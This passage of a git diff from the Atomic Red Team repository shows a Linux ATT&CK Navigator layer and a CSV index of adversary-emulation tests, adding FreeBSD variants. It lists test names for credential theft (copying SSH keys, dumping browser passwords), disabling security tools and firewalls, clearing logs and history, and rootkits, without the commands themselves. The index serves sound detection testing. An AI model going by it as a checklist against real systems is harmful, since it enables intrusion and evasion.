CLI\n- XOR decoding and command execution using Python\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - FreeBSD\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":2,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux\n- List Google Chromium Bookmark JSON Files on FreeBSD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- chflags - Remove immutable file attribute\n- Chmod through c script\n- Chmod through c script (freebsd)\n- Chown through c script\n- Chown through c script (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (FreeBSD/Linux)\n- Encrypt files using 7z (FreeBSD/Linux)\n- Encrypt files using ccrypt (FreeBSD/Linux)\n- Encrypt files using openssl (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n- Detect Virtualization Environment (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":2,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n- Security Software Discovery - pgrep (FreeBSD)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":9,"enabled":true,"comment":"\n- Restart System via `shutdown` - FreeBSD/macOS/Linux\n- Shutdown System via `shutdown` - FreeBSD/macOS/Linux\n- Restart System via `reboot` - FreeBSD/macOS/Linux\n- Shutdown System via `halt` - FreeBSD/Linux\n- Reboot System via `halt` - FreeBSD\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - FreeBSD/Linux\n- Reboot System via `poweroff` - FreeBSD\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":1,"enabled":true,"comment":"\n- Change User Password via passwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"comment":"\n- Create Systemd Service\n- Create SysV Service\n- Create Systemd Service file, Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Add command to .shrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n- Create/Append to .bash_logout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"comment":"\n- Trap EXIT\n- Trap EXIT (freebsd)\n- Trap SIGINT\n- Trap SIGINT (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Make and modify binary from C source (freebsd)\n- Set a SetUID flag on file\n- Set a SetUID flag on file (freebsd)\n- Set a SetGID flag on file\n- Set a SetGID flag on file (freebsd)\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"comment":"\n- Sudo usage\n- Sudo usage (freebsd)\n- Unlimited sudo cache timeout\n- Unlimited sudo cache timeout (freebsd)\n- Disable tty_tickets for sudo caching\n- Disable tty_tickets for sudo caching (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":3,"enabled":true,"comment":"\n- Find AWS credentials\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"comment":"\n- Search Through Bash History\n- Search Through sh History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with CP (freebsd)\n- Copy Private SSH Keys with rsync\n- Copy Private SSH Keys with rsync (freebsd)\n- Copy the users GnuPG directory with rsync\n- Copy the users GnuPG directory with rsync (freebsd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on FreeBSD\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM rule (freebsd)\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n- Encrypts collected data with AES-256 and Base64\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (FreeBSD/Linux)\n- Compressing data using bz2 in Python (FreeBSD/Linux)\n- Compressing data using zipfile in Python (FreeBSD/Linux)\n- Compressing data using tarfile in Python (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":43,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Disable journal logging via systemctl utility\n- Disable journal logging via sed utility\n"},{"techniqueID":"T1562.001","score":11,"enabled":true,"comment":"\n- Disable syslog\n- Disable syslog (freebsd)\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n- Tamper with Defender ATP on Linux/MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"comment":"\n- Disable history collection\n- Disable history collection (freebsd)\n- Mac HISTCONTROL\n- Clear bash history\n- Setting the HISTCONTROL environment variable\n- Setting the HISTFILESIZE environment variable\n- Setting the HISTSIZE environment variable\n- Setting the HISTFILE environment variable\n- Setting the HISTFILE environment variable (freebsd)\n- Setting the HISTIGNORE environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":13,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start Packet Filter\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Add and delete Packet Filter rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n- Disable iptables\n- Modify/delete iptables firewall rules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":4,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Auditing Configuration Changes on FreeBSD Host\n- Logging Configuration Changes on Linux Host\n- Logging Configuration Changes on FreeBSD Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 43e233ac90..9b6f436e15 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -1,5 +1,6 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh +defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,sh defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,sh @@ -10,33 +11,54 @@ defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,sh defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh +defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",10,chflags - Remove immutable file attribute,60eee3ea-2ebd-453b-a666-c52ce08d2709,sh defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",11,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh +defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",12,Chmod through c script (freebsd),da40b5fe-3098-4b3b-a410-ff177e49ee2e,sh defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh +defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh +defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh +defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh +defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh +defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh +defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",2,rm -rf,bd8ccc45-d632-481e-b7cf-c467627d68f9,sh +defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",5,Truncate system log files via truncate utility (freebsd),14033063-ee04-4eaf-8f5d-ba07ca7a097c,sh +defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",7,Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd),369878c6-fb04-48d6-8fc2-da9d97b3e054,sh +defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",10,Overwrite FreeBSD system log via echo utility,11cb8ee1-97fb-4960-8587-69b8388ee9d9,sh +defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",13,Delete system log files via unlink utility (freebsd),45ad4abd-19bd-4c5f-a687-41f3eee8d8c2,sh defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",18,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh +defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear sh history (rm),448893f8-1d5d-4ae2-9017-7fcd73a7e100,sh defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh +defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear sh history (echo),a4d63cb3-9ed9-4837-9480-5bf6b09a6c96,sh defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh +defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear sh history (cat dev/null),ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc,sh defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh +defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Clear sh history (ln dev/null),3126aa7a-8768-456f-ae05-6ab2d4accfdd,sh defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh +defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear sh history (truncate),e14d9bb0-c853-4503-aa89-739d5c0a5818,sh defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh +defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear history of a bunch of shells (freebsd),9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0,sh defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,15,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh +defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,16,Disable sh History Logging with SSH -T (freebsd),ec3f2306-dd19-4c4b-bed7-92d20e9b1dee,sh defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh +defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Base64 decoding with shell utilities (freebsd),b6097712-c42e-4174-b8f2-4b1e1a5bbb3d,sh +defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encode Shebang in CLI,18ee2002-66e8-4518-87c5-c0ec9c8299ac,sh defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash @@ -49,9 +71,11 @@ defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's mo defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh +defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start Packet Filter,0ca82ed1-0a94-4774-9a9a-a2c83a8022b7,sh defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh +defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Add and delete Packet Filter rules,8b23cae1-66c1-41c5-b79d-e095b6098b5b,sh defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh @@ -64,23 +88,32 @@ defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh +defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh +defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh +defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a 